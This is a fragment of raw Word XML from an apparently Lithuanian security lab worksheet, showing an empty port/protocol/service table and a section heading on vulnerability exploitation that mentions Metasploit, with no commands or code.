          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="47FF4623" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="092F97F8"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01E5C05E"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66117D42" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="3204ECD1" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2732928B"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5A2CB290"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7FCB36DE" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="176733BF" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01FDE5AC"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04609F80"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09D3A4D5" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="0E69BB3D" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D38EFB1"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3C505349"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7097E644" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="4347E96E" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0940C272" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="14703422" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2F8CAFFA" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B0C49A0" w14:textId="7171343F" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF907C5" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="right"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1056"/>
        <w:gridCol w:w="1243"/>
        <w:gridCol w:w="1636"/>
        <w:gridCol w:w="5699"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w14:paraId="76AA26FF" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0EABCBD7" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B"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Prievadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6FB79E37" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B"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Protokolas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="723D9D23" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B"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Paslauga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2959" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="40C23CFA" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B"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Paslaugos detalės</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w14:paraId="7F291470" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78A6FF37" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3999E77A" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60520EF5" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2959" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4714AC76" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w14:paraId="41B8DEBD" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66020A44" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7750BD06" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F7085B7" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2959" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4AC6A51B" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w14:paraId="775B3878" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C45E202" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4FFC4F67" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D7EF2D2" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2959" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A3611F2" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w14:paraId="3ECC8D21" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01923F58" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6294CE3C" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01B8C7A4" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2959" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28CF967A" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w14:paraId="1BE8FA23" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="484F0E6B" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53D0CD55" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFAD4B8" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C53AB7" w14:textId="383C3653" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Darbo eiga. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> išnaudojimas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="181A5689" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc258656090"/>
    </w:p>
    <w:p w14:paraId="45767905" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Programinės įrangos paleidimo ir paieškos pvz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0D97F2" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
